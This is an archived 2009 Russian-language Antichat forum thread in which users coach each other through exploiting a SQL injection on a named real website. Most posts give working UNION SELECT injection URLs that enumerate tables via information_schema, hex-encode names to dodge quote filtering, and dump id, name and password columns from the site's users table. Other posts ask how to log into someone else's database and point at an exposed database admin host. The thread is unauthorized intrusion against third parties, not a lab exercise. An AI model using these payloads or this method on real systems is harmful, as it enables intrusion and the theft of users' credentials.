ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #8721  
Старый 27.08.2009, 20:13
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно...

нашел интересные имена таблиц, users и userlist, подставляю их в запрос:

http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schem a.columns+where+table_name=7573657273

выводит WoW в тайтле.
Как получить всю интересующую нас инфу из этой таблицы? Если возможно, то без Limit?
 

  #8722  
Старый 27.08.2009, 20:17
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

group_concat()

_http://www.aawow.info/question2.php?id=-31+union+select+group_concat(column_name)+from+inf ormation_schema.columns+where+table_name=0x7573657 26c697374

0x757365726c697374 = userlist

Последний раз редактировалось .:[melkiy]:.; 27.08.2009 в 20:22..
 

  #8723  
Старый 27.08.2009, 20:19
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию

Цитата:
Сообщение от jecka3000  
ElteRUS, читал, но просто прочитать, а потом раскрутить любую скулю сложно...

нашел интересные имена таблиц, users и userlist, подставляю их в запрос:

http://www.aawow.info/question2.php?id=-31+union+select+column_name+from+information_schem a.columns+where+table_name=7573657273

выводит WoW в тайтле.
Если не ошибаюсь то надо не table_name а table_schema
Темболее нужно в хекс коде (точнее: 0x + HEX) подставлять если работаешь через where (если фильтруются ковычки)

Последний раз редактировалось wolmer; 27.08.2009 в 20:21..
 

  #8724  
Старый 27.08.2009, 20:38
Flair
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226

Репутация: 38
По умолчанию

Сильно не пинайте
как подкючится к чужой БД, естественно зная логин и пороль ))
 

  #8725  
Старый 27.08.2009, 20:45
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

в таблице users оказалисьнесколько интересных записей: name, pass

Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273

Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...
 

  #8726  
Старый 27.08.2009, 20:50
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
Сообщение от Flair  
Сильно не пинайте
как подкючится к чужой БД, естественно зная логин и пороль ))
Заюзать скрипт или прогу если есстественно разрешен конект из вне...
 

  #8727  
Старый 27.08.2009, 20:50
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от jecka3000  
в таблице users оказалисьнесколько интересных записей: name, pass

Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273

Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...

жжёшь, ты читал хоть что-то?


Цитата:
Сообщение от jecka3000  
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273
_http://www.aawow.info/question2.php?id=-31+union+select+concat_ws(0x3a,id,name,pass)+from+ aawowinf_mrlink.users

Последний раз редактировалось .:[melkiy]:.; 27.08.2009 в 20:59..
 

  #8728  
Старый 27.08.2009, 20:53
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
Сообщение от jecka3000  
в таблице users оказалисьнесколько интересных записей: name, pass

Делаю запрос:
http://www.aawow.info/question2.php?id=-31+union+select+concat(name,0x20,pass)+from+0x7573 657273

Пробовал переводить в хекс и нэйм и пасс, ничего хорошего не выходит...
Пипец фрукт, ты читать когда пойдешь? БД глянь в которой находится таблица, вероятно, что таблица users не находится в текущей БД... по поводу перевода в хекс промолчу пожалуй...
Цитата:
Сообщение от wolmer  
Если не ошибаюсь то надо не table_name а table_schema
Ошибаешься.

Последний раз редактировалось DrAssault; 27.08.2009 в 20:56..
 

  #8729  
Старый 28.08.2009, 00:11
Micorubu
Новичок
Регистрация: 27.08.2009
Сообщений: 1
Провел на форуме:
833

Репутация: 0
По умолчанию

Ребят, можно ли что либо с этим сделать или из этого нельзя извлечь выгоду?
_http://mysql.infobox.ru/server_databases.php
_http://mysql.infobox.ru/
 

  #8730  
Старый 28.08.2009, 01:22
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://www.allthat.nm.ru/107.htm

помимо хss и инклудов че ещё тут актуально?
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ